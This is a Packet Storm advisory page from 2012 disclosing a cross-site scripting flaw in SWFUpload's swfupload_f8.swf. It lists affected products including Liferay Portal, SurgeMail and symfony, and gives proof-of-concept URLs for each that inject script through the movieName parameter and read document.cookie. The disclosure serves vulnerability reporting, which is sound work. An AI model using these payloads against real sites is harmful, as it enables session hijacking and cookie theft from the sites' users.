what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

swfupload_f8.swf Cross Site Scripting

swfupload_f8.swf Cross Site Scripting
Posted Nov 21, 2012
Authored by MustLive

swfupload_f8.swf suffers from a cross site scripting vulnerability. Affected systems are TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS, AionWeb, Liferay Portal (Community Edition, which earlier was called Standard Edition, and Enterprise Edition), SurgeMail, and symfony.

tags | exploit, xss
SHA-256 | 7cb01fdd1e05d212be9f91472666f74a1a2ccbefb7f0261aa01eccfa4a976751

swfupload_f8.swf Cross Site Scripting

Change Mirror Download
Hello list!

I will draw your attention to XSS vulnerability in other web applications
with swfupload. Earlier I've wrote about swfupload in AionWeb, Magento,
Liferay Portal, SurgeMail, symfony and that this hole is available in many
other web applications.

In previous letters I've wrote concerning web applications with
swfupload.swf and swfupload_f9.swf (which are for Flash Player 10 and Flash
Player 9). And now I'll write about web applications with swfupload_f8.swf
(which is for Flash Player 8). Here is information about Archiv plugin for
TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS,
AionWeb, Liferay Portal (Community Edition, which earlier called Standard
Edition, and Enterprise Edition), SurgeMail, symfony - among multiple web
applications which are bundled with swfupload_f8.swf.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of Archiv plugin for TinyMCE,
Squeeze Documents for SPIP, Upload Manager for Radiant CMS, AionWeb, Liferay
Portal (Community Edition, which earlier called Standard Edition, and
Enterprise Edition), SurgeMail, symfony. There is no information that they
have fixed this vulnerability in their software (at that this vulnerability
was fixed in WordPress 3.3.2 at 20.04.2012).

The developers of WordPress released new version of flash file (the same did
the developers of XenForo), which could be used by all web developers, which
were using swfupload. But in WordPress and XenForo the swfupload.swf was
fixed, not swfupload_f8.swf and these are different versions of the same
flash application (designed for different versions of Flash Player). Taking
into account current wide spreading of Flash Player 10.x and 11.x, then
developers of these web applications could replace swfupload_f8.swf with new
fixed version of Swfupload.

----------
Details:
----------

XSS (WASC-08):

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Squeeze Documents for SPIP:

http://site/plugins_spip/squeeze_documents/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/plugins_spip/squeeze_documents/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Upload Manager for Radiant CMS:

http://site/public/swfupload/Flash8/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/public/swfupload/Flash9/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb also contains swfupload_f8.swf, besides described earlier
swfupload.swf and swfupload_f9.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Liferay Portal also contains swfupload_f8.swf, besides described earlier
swfupload_f9.swf.

SurgeMail:

http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

SurgeMail also contains swfupload_f8.swf, besides described earlier
swfupload.swf and swfupload_f9.swf.

symfony:

http://site/plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

symfony also contains swfupload_f8.swf, besides described earlier
swfupload_f9.swf.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close